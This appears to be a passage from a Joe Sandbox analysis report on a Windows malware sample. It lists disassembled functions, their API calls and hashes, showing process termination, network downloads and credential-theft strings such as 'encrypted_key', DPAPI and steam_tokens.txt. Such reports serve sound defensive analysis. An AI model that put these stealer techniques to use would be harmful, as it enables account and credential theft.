                                • Instruction Fuzzy Hash: 3251BD71A5020A9FCB10FF69DC45B9EB7A6EF06314F254069F949EB251DA70ED018FA0
                                Function 006A5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006A565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A5661
                                • InternetOpenA.WININET(006CCFEC,00000000,00000000,00000000,00000000), ref: 006A5677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 006A5692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 006A56BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 006A56E1
                                • InternetCloseHandle.WININET(?), ref: 006A56FA
                                • InternetCloseHandle.WININET(00000000), ref: 006A5701
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 529594fe4f19bc74408d8e7af91b602b32f0f714f078db2840996054fb3eae6e
                                • Instruction ID: bead559711b5e07f2ccef8811a33af95d5d56dd940949cdc8a39a7e514dea953
                                • Opcode Fuzzy Hash: 529594fe4f19bc74408d8e7af91b602b32f0f714f078db2840996054fb3eae6e
                                • Instruction Fuzzy Hash: 0A416A70A01605EFDB14DF54DC88FAAB7B6FF49310F1481AAE909AB2A0E7719D41CF94
                                Function 006C4740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006C4759
                                • Process32First.KERNEL32(00000000,00000128), ref: 006C4769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 006C47AB
                                • CloseHandle.KERNEL32(00000000), ref: 006C47B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C47C0
                                • CloseHandle.KERNEL32(00000000), ref: 006C47CB
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 768e4cf090360f53391fe7c7981cd1c6e902832d9d91178d8c958d3c94b19bc2
                                • Instruction ID: c8b4e962b50a139c853c6c2a74bcfdeabd31548e77c446f49e4fe068c864488d
                                • Opcode Fuzzy Hash: 768e4cf090360f53391fe7c7981cd1c6e902832d9d91178d8c958d3c94b19bc2
                                • Instruction Fuzzy Hash: 7301B571602614ABE7209B60AC89FFA77BDFB08752F040286F949E1180EF748D808A70
                                Function 006B83E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006B8435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B846C
                                • lstrlen.KERNEL32(00000000), ref: 006B84B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B84E9
                                • lstrlen.KERNEL32(00000000), ref: 006B84FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B852E
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006B853E
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: a9ccf66133bc8b8f7ee5e10ff95869c6fe7db43a85c45cb0a6a3deba33c8b6c5
                                • Instruction ID: 5deaa271fe5c1fe370d640f5f37da11bbcbd07d603a7679ff4e774b8e3ad648b
                                • Opcode Fuzzy Hash: a9ccf66133bc8b8f7ee5e10ff95869c6fe7db43a85c45cb0a6a3deba33c8b6c5
                                • Instruction Fuzzy Hash: DF516CB25002029FCB64DF29D894A9BB7FAEF45700F148559E886DB355EF30ED81CB50
                                Function 006C2910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006C2925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C292C
                                • RegOpenKeyExA.ADVAPI32(80000002,0132B970,00000000,00020119,006C28A9), ref: 006C294B
                                • RegQueryValueExA.ADVAPI32(006C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006C2965
                                • RegCloseKey.ADVAPI32(006C28A9), ref: 006C296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: a4070ec245061ae70b7c29920930f7f8f1066f16a4d5b5349e12796e279a1ff3
                                • Instruction ID: 6de5ee4227b7710964bd78d089730437cc7f83c8393b7870bd72e58705c42c08
                                • Opcode Fuzzy Hash: a4070ec245061ae70b7c29920930f7f8f1066f16a4d5b5349e12796e279a1ff3
                                • Instruction Fuzzy Hash: 9601BC75A01219ABD310DBA5AC59FFB7BBDFB48711F10019AFE85D7240EA3159048BA0
                                Function 006C2880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006C2895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C289C
                                  • Part of subcall function 006C2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006C2925
                                  • Part of subcall function 006C2910: RtlAllocateHeap.NTDLL(00000000), ref: 006C292C
                                  • Part of subcall function 006C2910: RegOpenKeyExA.ADVAPI32(80000002,0132B970,00000000,00020119,006C28A9), ref: 006C294B
                                  • Part of subcall function 006C2910: RegQueryValueExA.ADVAPI32(006C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006C2965
                                  • Part of subcall function 006C2910: RegCloseKey.ADVAPI32(006C28A9), ref: 006C296F
                                • RegOpenKeyExA.ADVAPI32(80000002,0132B970,00000000,00020119,006B9500), ref: 006C28D1
                                • RegQueryValueExA.ADVAPI32(006B9500,0133E950,00000000,00000000,00000000,000000FF), ref: 006C28EC
                                • RegCloseKey.ADVAPI32(006B9500), ref: 006C28F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: cc8f7125c290de144b40c04b82035a8d37fbb969e3430ffc3b44350690fc2365
                                • Instruction ID: c1a87da7cda4921280ae53734e4340dee29119d4b2555792c0a738285b8d23c4
                                • Opcode Fuzzy Hash: cc8f7125c290de144b40c04b82035a8d37fbb969e3430ffc3b44350690fc2365
                                • Instruction Fuzzy Hash: D201A271A02209FBD710ABA4AC49FBA7B7DFB44311F00025AFE08D2250DA709D4487A0
                                Function 006A71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 006A723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 006A7279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A7280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006A72C3
                                • HeapFree.KERNEL32(00000000), ref: 006A72CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 006A7329
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: 69f5f31ca8700b8f6fe2db25d9f13950d6ca8a1cec8e84415ecefe54de04f4fc
                                • Instruction ID: ec16d57f91dd07488ae4bb48043133ef1278173adc97dc81fd4b20fefe68e684
                                • Opcode Fuzzy Hash: 69f5f31ca8700b8f6fe2db25d9f13950d6ca8a1cec8e84415ecefe54de04f4fc
                                • Instruction Fuzzy Hash: 1B414B71705606DBDB20DF69EC84BAAB3EAFB8A315F1445AAEC49C7340E631ED009B50
                                Function 006A9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006A9CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006A9CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006A9D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: 1ab61dd52e9c1884ef6bba7e896854337b66b46d66f1a8cef00f63d28980ba9a
                                • Instruction ID: bb388bdc88e968dbdc8b8b32f0ae037e7dc927f90cde87180195703f0acb984a
                                • Opcode Fuzzy Hash: 1ab61dd52e9c1884ef6bba7e896854337b66b46d66f1a8cef00f63d28980ba9a
                                • Instruction Fuzzy Hash: 3141E671A0060A9BCB20FF79DC416EE7BB6EF42304F148568E915A7352EA30DD40CFA0
                                Function 006BE9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BEA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BEA53
                                • lstrcat.KERNEL32(?,00000000), ref: 006BEA61
                                • lstrcat.KERNEL32(?,006D1794), ref: 006BEA7A
                                • lstrcat.KERNEL32(?,013393F8), ref: 006BEA8D
                                • lstrcat.KERNEL32(?,006D1794), ref: 006BEA9F
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: f0546c35ecb6ef8b7d89db39d538e8e611bb63bc1ac6a9567914de554b1879cd
                                • Instruction ID: e7759421be404d7b3ec5c4c2a80485dfe4fb6fc666f700e5a572a745087dad90
                                • Opcode Fuzzy Hash: f0546c35ecb6ef8b7d89db39d538e8e611bb63bc1ac6a9567914de554b1879cd
                                • Instruction Fuzzy Hash: C641C6B1A50119ABCB55FB68DC52EED73BAFF48300F00459DF61A97290DE709E848F94
                                Function 006BECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BECDF
                                • lstrlen.KERNEL32(00000000), ref: 006BECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BED1D
                                • lstrlen.KERNEL32(00000000), ref: 006BED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 006BED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: 1e8872e68ee7e54ba6831340868ca0090aacc87b5cd97bdb6aa4c90ae0c68864
                                • Instruction ID: e176e3f7edcbb3eeefc1bae4863d57a452b68b6f7383a626b314f8a809cf5cd8
                                • Opcode Fuzzy Hash: 1e8872e68ee7e54ba6831340868ca0090aacc87b5cd97bdb6aa4c90ae0c68864
                                • Instruction Fuzzy Hash: 6331A2B1B511165BC761BB7AEC1AAEE7BA7AF42300F040168F946CB322EF24DC454BC5
                                Function 006A9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,006A140E), ref: 006A9A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,006A140E), ref: 006A9AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,006A140E), ref: 006A9AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,006A140E,00000000,?,?,?,006A140E), ref: 006A9AE0
                                • LocalFree.KERNEL32(?,?,?,?,006A140E), ref: 006A9B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,006A140E), ref: 006A9B07
                                Memory Dump Source
